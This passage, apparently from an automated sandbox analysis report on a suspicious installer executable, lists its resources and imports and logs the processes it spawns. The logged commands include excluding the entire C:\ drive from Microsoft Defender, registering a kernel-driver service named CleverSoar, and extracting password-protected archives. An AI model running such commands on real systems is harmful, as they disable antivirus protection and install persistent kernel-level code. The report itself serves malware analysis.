                          RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                          RT_STRING0xd8e000x3f8data0.3198818897637795
                          RT_STRING0xd91f80x2dcdata0.36475409836065575
                          RT_STRING0xd94d40x430data0.40578358208955223
                          RT_STRING0xd99040x44cdata0.38636363636363635
                          RT_STRING0xd9d500x2d4data0.39226519337016574
                          RT_STRING0xda0240xb8data0.6467391304347826
                          RT_STRING0xda0dc0x9cdata0.6410256410256411
                          RT_STRING0xda1780x374data0.4230769230769231
                          RT_STRING0xda4ec0x398data0.3358695652173913
                          RT_STRING0xda8840x368data0.3795871559633027
                          RT_STRING0xdabec0x2a4data0.4275147928994083
                          RT_RCDATA0xdae900x10data1.5
                          RT_RCDATA0xdaea00x310data0.6173469387755102
                          RT_RCDATA0xdb1b00x2cdata1.2045454545454546
                          RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                          RT_VERSION0xdb2980x584dataEnglishUnited States0.2769121813031161
                          RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                          Imports

                          DLLImport
                          kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dllInitCommonControls
                          user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                          Exports

                          NameOrdinalAddress
                          __dbk_fcall_wrapper20x40fc10
                          dbkFCallWrapperAddr10x4b063c

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          No network behavior found

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\cVyexkZjrG.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\cVyexkZjrG.exe"
                          Imagebase:0x580000
                          File size:7'370'578 bytes
                          MD5 hash:4E1927F742599F95F0D9450B4B8C2C80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe"
                          Imagebase:0xc00000
                          File size:3'366'912 bytes
                          MD5 hash:0195248B8EBF37D072592944E7488FC4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:00:23:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6ef0c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:6
                          Start time:00:23:36
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\cVyexkZjrG.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
                          Imagebase:0x580000
                          File size:7'370'578 bytes
                          MD5 hash:4E1927F742599F95F0D9450B4B8C2C80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:7
                          Start time:00:23:36
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
                          Imagebase:0xc0000
                          File size:3'366'912 bytes
                          MD5 hash:0195248B8EBF37D072592944E7488FC4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:8
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:9
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0xb30000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, Virustotal, Browse
                          • Detection: 0%, ReversingLabs
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:11
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:12
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:13
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0xb30000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:14
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:15
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:16
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:17
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:18
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:19
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:20
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:21
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:22
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:23
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:24
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:25
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:26
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:27
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:28
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:29
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:30
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:31
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:32
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:33
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:34
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:35
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:36
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:37
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:38
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:39
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:40
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:41
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:42
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:43
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:44
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:45
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:46
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:47
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:48
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:49
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:50
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:51
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:52
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:53
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:54
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:55
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:56
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
